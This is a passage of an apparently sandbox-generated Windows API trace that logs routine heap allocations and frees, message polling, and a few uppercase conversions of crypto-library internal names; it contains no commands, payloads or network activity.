RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0257.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0270 | out: hHeap=0x970000) returned 1 [0257.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0258 [0257.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0490 | out: hHeap=0x970000) returned 1 [0257.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0257.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0257.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0257.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0257.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0257.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0258.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0258.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0478 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0258.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0680 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0478 | out: hHeap=0x970000) returned 1 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0258.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0258.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0258.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0258.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0258.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0258.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0258.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0258.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0258.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0258.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0258.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0258.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0258.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0258.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0258.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0258.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0258.040] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0258.040] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0258.040] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0258.041] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0478 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0258.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0888 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0478 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0478 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0888 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0258.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0888 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0478 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.042] 